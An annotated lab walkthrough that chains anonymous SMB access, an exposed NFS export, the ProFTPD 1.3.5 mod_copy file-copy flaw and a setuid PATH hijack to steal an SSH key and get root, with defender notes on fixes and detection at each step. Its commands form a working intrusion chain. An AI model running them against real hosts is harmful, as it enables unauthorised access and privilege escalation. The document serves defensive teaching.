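# Annotated command transcript, not a runnable script. TARGET_IP is a
# placeholder for the lab host. Lines typed inside an interactive session
# (smbclient prompt, raw FTP control connection) are marked as such.
# Each step keeps the original command and adds the root cause and the
# hardening that would have broken the chain at that point.

# Step 1: Scan
# -sV probes service versions, -sC runs nmap's default script set.
nmap -sV -sC TARGET_IP
# 21 FTP (ProFTPD 1.3.5)
# 22 SSH
# 80 HTTP
# 111 rpcbind (NFS)
# 139/445 SMB
# Defender note: FTP, rpcbind/NFS and SMB are all reachable from the scanning
# host. Filtering these file-sharing services to the clients that need them
# removes the starting point for every later step.

# Step 2: SMB Enumeration
# -N means "no password": the share list is readable by an unauthenticated
# session.
smbclient -L //TARGET_IP -N
# Found share: anonymous

smbclient //TARGET_IP/anonymous -N
# (typed at the smbclient prompt)
smb: \> get log.txt
# Contains kenobi's SSH key path: /home/kenobi/.ssh/id_rsa
# Defender note: two separate problems here. The share allows guest access
# (smb.conf: `guest ok = no`, `map to guest = Never`), and a log that discloses
# a private-key location was left in a world-readable share.

# Step 3: Check NFS
# showmount -e lists the server's export table.
showmount -e TARGET_IP
# /var is exported!
# Defender note: the export list itself is visible to any client, and /var is
# a broad tree to export. In /etc/exports, export only the directory that is
# needed, to named client hosts, and keep root_squash enabled.

# Step 4: ProFTPD Exploitation
# ProFTPD 1.3.5 has mod_copy vulnerability
searchsploit proftpd 1.3.5

# Connect and copy SSH key to /var
nc TARGET_IP 21
# (sent over the FTP control connection; the listing shows no USER/PASS login
# before these commands)
SITE CPFR /home/kenobi/.ssh/id_rsa
SITE CPTO /var/tmp/id_rsa
# Defender note: mod_copy's SITE CPFR/CPTO copy a file server-side with the
# daemon's privileges. Upgrade ProFTPD or unload mod_copy if it is not needed.
# For detection, SITE CPFR / SITE CPTO in the FTP command log, especially with
# a source path under a home directory's .ssh, is a high-signal event.
# NOTE(review): the copy succeeding implies the FTP daemon could read kenobi's
# key; the account it runs as is not shown on the page.

# Step 5: Mount NFS and Get Key
# The copy landed in /var/tmp, which sits inside the exported /var tree, so the
# file becomes readable from any host allowed to mount the export.
mkdir /mnt/kenobi
mount TARGET_IP:/var /mnt/kenobi
cp /mnt/kenobi/tmp/id_rsa .
# ssh refuses a private key whose permissions let other users read it.
chmod 600 id_rsa
# Defender note: neither weakness yields the key alone. The file-copy primitive
# (step 4) and the openly mountable export (step 3) only work in combination,
# so fixing either one breaks the chain.

# Step 6: SSH Access
ssh -i id_rsa kenobi@TARGET_IP
cat user.txt
# Defender note: the key is used directly; presumably it has no passphrase
# (no prompt is shown in the listing). A passphrase-protected key would not be
# usable from the file alone. Once a private key has been readable by others,
# remove its public half from authorized_keys and issue a new pair.

# Step 7: SUID Privilege Escalation
# Lists setuid files; 2>/dev/null hides permission-denied noise.
find / -perm -u=s -type f 2>/dev/null
# Found: /usr/bin/menu (unusual!)

strings /usr/bin/menu
# Calls curl without full path

# Path manipulation
cd /tmp
echo '/bin/bash' > curl
chmod +x curl
export PATH=/tmp:$PATH
/usr/bin/menu
# Choose option, triggers our fake curl
# Root!
# Defender note: the root cause is a setuid-root program resolving a helper by
# bare name through the caller's PATH. A privileged binary should invoke
# helpers by absolute path (e.g. /usr/bin/curl) and reset its environment, or
# not be setuid at all. Comparing the output of the find command above against
# a known-good baseline surfaces non-distribution setuid files such as this one.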